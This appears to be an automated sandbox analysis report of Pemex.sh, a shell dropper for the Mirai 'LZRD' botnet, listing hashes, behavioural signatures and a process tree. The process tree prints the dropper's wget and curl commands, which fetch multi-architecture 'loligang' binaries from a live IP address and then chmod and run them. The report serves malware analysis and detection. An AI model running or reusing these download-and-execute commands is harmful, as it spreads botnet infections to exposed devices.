Analysis

  • max time kernel
    105s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    23-12-2024 06:19

General

  • Target

    Pemex.sh

  • Size

    1KB

  • MD5

    e18ba04d72384ac85e6117c774f6d4f9

  • SHA1

    6cb8e9a2da2db042da0875a08f43cc867b8a2c5b

  • SHA256

    289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e

  • SHA512

    3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (172668) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 20 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 10 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 10 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Pemex.sh
    /tmp/Pemex.sh
    1⤵
    • Writes file to tmp directory
    PID:1495
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:1496
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:1500
    • /bin/cat
      cat loligang.x86
      2⤵
        PID:1501
      • /bin/chmod
        chmod +x awoo config-err-BdnwVs loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-PhQ8Az
        2⤵
        • File and Directory Permissions Modification
        PID:1502
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1503
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1507
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1513
      • /bin/chmod
        chmod +x awoo config-err-BdnwVs loligang.mips loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-PhQ8Az
        2⤵
        • File and Directory Permissions Modification
        PID:1515
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1516
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1520
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1524
      • /bin/chmod
        chmod +x awoo config-err-BdnwVs loligang.mips loligang.mpsl loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-PhQ8Az
        2⤵
        • File and Directory Permissions Modification
        PID:1528
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1529
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.arm4
        2⤵
          PID:1533
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
          2⤵
          • Writes file to tmp directory
          PID:1537
        • /bin/chmod
          chmod +x awoo config-err-BdnwVs loligang.arm4 loligang.mips loligang.mpsl loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-PhQ8Az
          2⤵
          • File and Directory Permissions Modification
          PID:1539
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1540
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm5
          2⤵
          • Writes file to tmp directory
          PID:1544
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
          2⤵
          • Writes file to tmp directory
          PID:1552
        • /bin/chmod
          chmod +x awoo config-err-BdnwVs loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-PhQ8Az
          2⤵
          • File and Directory Permissions Modification
          PID:1554
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1555
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm6
          2⤵
          • Writes file to tmp directory
          PID:1559
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
          2⤵
          • Writes file to tmp directory
          PID:1565
        • /bin/chmod
          chmod +x awoo config-err-BdnwVs loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-PhQ8Az
          2⤵
          • File and Directory Permissions Modification
          PID:1567
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1568
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm7
          2⤵
          • Writes file to tmp directory
          PID:1572
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
          2⤵
          • Writes file to tmp directory
          PID:1580
        • /bin/chmod
          chmod +x awoo config-err-BdnwVs loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue
          2⤵
          • File and Directory Permissions Modification
          PID:1582
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1583
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.ppc
          2⤵
          • Writes file to tmp directory
          PID:1587
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
          2⤵
          • Writes file to tmp directory
          PID:1591
        • /bin/chmod
          chmod +x awoo config-err-BdnwVs loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue
          2⤵
          • File and Directory Permissions Modification
          PID:1593
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1594
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.m68k
          2⤵
          • Writes file to tmp directory
          PID:1598
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
          2⤵
          • Writes file to tmp directory
          PID:1604
        • /bin/chmod
          chmod +x awoo config-err-BdnwVs loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue
          2⤵
          • File and Directory Permissions Modification
          PID:1606
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1607
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.sh4
          2⤵
          • Writes file to tmp directory
          PID:1611
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.sh4
          2⤵
          • Writes file to tmp directory
          PID:1615
        • /bin/chmod
          chmod +x awoo config-err-BdnwVs loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 netplan_2az14oqi Pemex.sh snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue
          2⤵
          • File and Directory Permissions Modification
          PID:1617
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1618

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/loligang.x86

        Filesize

        64KB

        MD5

        2354f2531c0bf296738fa7733c42785f

        SHA1

        86508e4ee74c70bf226f6666bf227a12be69dcad

        SHA256

        3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93

        SHA512

        eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679